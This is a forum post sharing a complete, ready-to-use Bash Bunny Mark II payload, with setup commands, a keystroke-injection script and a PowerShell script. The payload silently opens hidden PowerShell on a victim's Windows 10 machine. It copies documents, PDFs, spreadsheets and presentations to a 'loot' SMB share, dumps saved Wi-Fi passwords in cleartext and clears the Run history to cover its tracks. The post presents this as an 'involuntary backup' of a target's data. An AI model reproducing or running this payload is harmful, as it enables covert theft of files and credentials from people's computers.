Jump to content

SMB Exfil to microSD (Mark2)


jblk01

Recommended Posts

Now you can involuntary backup more of the targets data by writing to the microSD card instead of the internal storage.

 

Prerequisite:

 

SSH or serial into your Bunny MK2 and do the following:

 

'timedatectl set-time' followed by the current year, month and date.

Run: 'apt update ; apt install gcc'

'cd /tools'

'wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz'

'tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/'

'rm -f impacket-0.9.19.tar.gz'

'cd impacket'

'pip install -r requirements.txt'

'cd ../'

'mkdir tmp'

'cd tmp'

'pip2 install setuptools-rust'

'pip2 install cryptography'

'wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg'

 'rm -f pyans1-0.4.8-py2.7.egg'

'wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz'

'tar -xzvf pycryptodomex-3.10.1.tar.gz'

'cd pycryptodomex-2.10.1 && python setup.py install' 

'cd /tools/'

'rm -rf tmp/'

'cd impacket/ && python setup.py install'

 

Now on your microSD card, create the following directory structure:

 

/smb
|___loot/
|___s.ps1

 

Copy the following payload.txt into either switch 1 or switch 2:

 

######## INITIALIZATION ########
REQUIRETOOL impacket
GET SWITCH_POSITION
# Mound SD as udisk
udisk mount

######## ETHERNET STAGE ########
LED STAGE1
# Start the SMB Server
python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /root/udisk/smb >> /root/udisk/smb/smbserver.log &


######## HID STAGE ########
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
GET HOST_IP
LED STAGE2
ATTACKMODE HID RNDIS_ETHERNET
Q GUI r
Q DELAY 500
Q STRING cmd /C \"start /b powershell -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
Q ENTER
LED SPECIAL
# Wait until files are done copying
while ! [ -f /root/udisk/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done


######## CLEANUP ########
LED CLEANUP
# Delete EXFILTRATION_COMPLETE file
rm -rf /root/udisk/smb/EXFILTRATION_COMPLETE
# Sync file system
sync
# Unmount the SD card
udisk unmount

######## FINISH ########
# Trap is clean
sync
LED FINISH
shutdown 0

 

Finally here is the s.ps1:

 

$exfil_dir="$Env:UserProfile\Downloads"
$exfil_dir1="$Env:UserProfile\Documents"
$exfil_dir2="$Env:UserProfile\Desktop"
$exfil_ext="*.doc*"
$exfil_ext1="*.pdf*"
$exfil_ext2="*.xls*"
$exfil_ext3="*.ppt*"
$loot_dir="\\172.16.64.1\s\loot\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
mkdir $loot_dir
robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z
robocopy $exfil_dir1 $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z
robocopy $exfil_dir2 $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >$loot_dir\$env:UserName".txt"
New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

 

Now, eject the microSD card, insert into your Bunny MK2, move the switch to the one where the payload.txt is placed and insert it into a Windows 10 machine.

 

If done correctly, it should exfiltrate all files specified in the s.ps1 script to the microSD card. 🙂

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...